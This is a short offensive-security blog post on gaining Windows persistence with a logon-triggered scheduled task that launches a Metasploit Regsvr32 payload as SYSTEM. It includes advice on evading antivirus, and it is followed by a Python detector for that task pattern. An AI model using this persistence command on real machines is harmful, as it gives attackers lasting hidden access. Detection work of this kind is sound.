Schtasks Persistence

    I'll warn you up front, this may or may not work with certain a/v products. You also don't need to use Metasploit and, in fact, you're probably better off if you don't. The concept is the same though: we're going to schedule a task to run in Windows on login. What we choose to execute can be anything really, and it's probably better if it's something that can avoid detection from a/v.

    Using the Metasploit method, we set up script delivery:

    There are quite a few targets but I'm using Regsvr32.  When we run, it's a job and therefore will run in the background:

    We take the URL and we add that to our command:

    schtasks /create /tn Persist /TR "regsvr32 /s /n /u /i: scrobj.dll" /SC onlogon /RU System

    When we look in Task Scheduler, we see our newly created task:

    When we log out and back in, we catch our session:

    Pretty simple, and again, we just need to schedule something in order to achieve that persistence on logon.
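From the defender's side, the task created above has three traits that show up in process-creation logs: a logon trigger, the SYSTEM account, and a regsvr32 action that loads scrobj.dll. The following is an added example, not part of the original post; it parses `schtasks /create` command lines and reports those traits. The finding names and sample lines are constructed for illustration.

```python
import re

TOKEN = re.compile(r'"[^"]*"|\S+')            # quoted string or bare word
VALUE_SWITCHES = {"/tn", "/tr", "/sc", "/ru"}  # switches followed by a value
SYSTEM_ACCOUNTS = {"system", "nt authority\\system"}

def parse_schtasks_create(cmdline):
    """Return {switch: value} for a `schtasks /create` line, else None."""
    tokens = [t.strip('"') for t in TOKEN.findall(cmdline)]
    if not tokens:
        return None
    exe = tokens[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args = tokens[1:]
    if exe not in ("schtasks", "schtasks.exe"):
        return None
    if "/create" not in (a.lower() for a in args):
        return None
    opts = {}
    for switch, value in zip(args, args[1:]):
        if switch.lower() in VALUE_SWITCHES:   # switches are case-insensitive
            opts[switch.lower()] = value
    return opts

def assess(cmdline):
    """List the persistence traits found in one process command line."""
    opts = parse_schtasks_create(cmdline)
    if opts is None:
        return []
    findings = []
    if opts.get("/sc", "").lower() == "onlogon":
        findings.append("logon-trigger")
    if opts.get("/ru", "").lower() in SYSTEM_ACCOUNTS:
        findings.append("runs-as-system")
    action = opts.get("/tr", "").lower()
    if "regsvr32" in action and "scrobj.dll" in action and "/i:" in action:
        findings.append("regsvr32-scriptlet-action")
    return findings

# Constructed sample command lines (the first is the command shown in the post).
SAMPLES = [
    'schtasks /create /tn Persist /TR "regsvr32 /s /n /u /i: scrobj.dll" /SC onlogon /RU System',
    r'C:\Windows\System32\schtasks.exe /Create /TN "Nightly Backup" /TR "C:\Tools\backup.exe --full" /SC daily /RU svc_backup',
    r'"C:\Windows\System32\schtasks.exe" /create /tn Updater /tr "C:\Program Files\App\update.exe" /sc ONLOGON',
    'schtasks /query /fo LIST',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(assess(line) or ["no-findings"], "<-", line)
```

A logon trigger on its own is common for legitimate updaters, so alert on the combination of traits rather than on any single one.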

    © 2020